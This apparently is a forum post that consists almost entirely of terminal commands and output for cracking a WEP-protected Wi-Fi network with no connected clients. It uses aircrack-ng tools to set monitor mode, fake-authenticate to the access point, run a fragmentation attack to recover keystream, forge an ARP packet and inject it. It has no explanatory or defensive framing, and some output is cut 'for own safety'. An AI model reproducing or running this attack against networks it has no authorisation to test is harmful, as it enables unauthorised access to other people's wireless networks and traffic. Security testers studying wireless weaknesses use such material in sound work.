It looks like you're new here. If you want to get involved, click one of these buttons!
# airmon-ng start wlan0
# iwconfig
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
# airodump-ng --channel 10 -w wep-no-sta mon
# aireplay-ng -1 0 -e <essid> -b 55:44:33:22:11:00 mon0
waiting for beacon frame (ESSID: <essid>) on channel 10
Found BSSID \"55:44:33:22:11:00\" to given ESSID \"<essid>\".
05:26:41 Sending Authentication Request (Open System) [ACK]
05:26:41 Authentication successful
05:26:41 Sending Association Request [ACK]
05:26:41 Association successful :-) (AID: 1)
# aireplay-ng -5 -b 55:44:33:22:11:00 -h 00:11:22:33:44:55 mon0
04:54:41 Waiting for beacon frame (BSSID: 55:44:33:22:11:00) on channel 10
04:54:41 Waiting for a data packet...
Read 725 packets...
Size: 344, FromDS: 1, ToDS: 0 (WEP)
BSSID = 55:44:33:22:11:00
Dest. MAC = XX:XX:XX:XX:XX:XX
Source MAC = 55:44:33:22:11:00
//--CUT FOR OWN SAFETY, YOU KNOW GUYS SAFETY FIRST :)
Use this packet ? y
Saving chosen packet in replay_src-0528-045527.cap
04:59:19 Data packet found!
04:59:19 Sending fragmented packet
04:59:19 Got RELAYED packet!!
04:59:19 Trying to get 384 bytes of a keystream
04:59:19 Got RELAYED packet!!
04:59:19 Trying to get 1500 bytes of a keystream
04:59:19 Got RELAYED packet!!
Saving keystream in fragment-0528-045919.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
# packetforge-ng -0 -a 55:44:33:22:11:00 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0528-045919.xor -w arpforge
Wrote packet to: arpforge
# tcpdump -e -vvv -n -s0 -r arpforge
reading from file arpforge, link-type IEEE802_11 (802.11)
05:55:31.757099 WEP Encrypted 258us BSSID:55:44:33:22:11:00 SA:00:11:22:33:44:55 DA:ff:ff:ff:ff:ff:ff Data IV:96f08 Pad 0 KeyID 0
# aireplay-ng -2 -r arpforge mon0
No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 55:44:33:22:11:00
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:11:22:33:44:55
//--CUT YOU KNOW WHY !!!
Use this packet ? y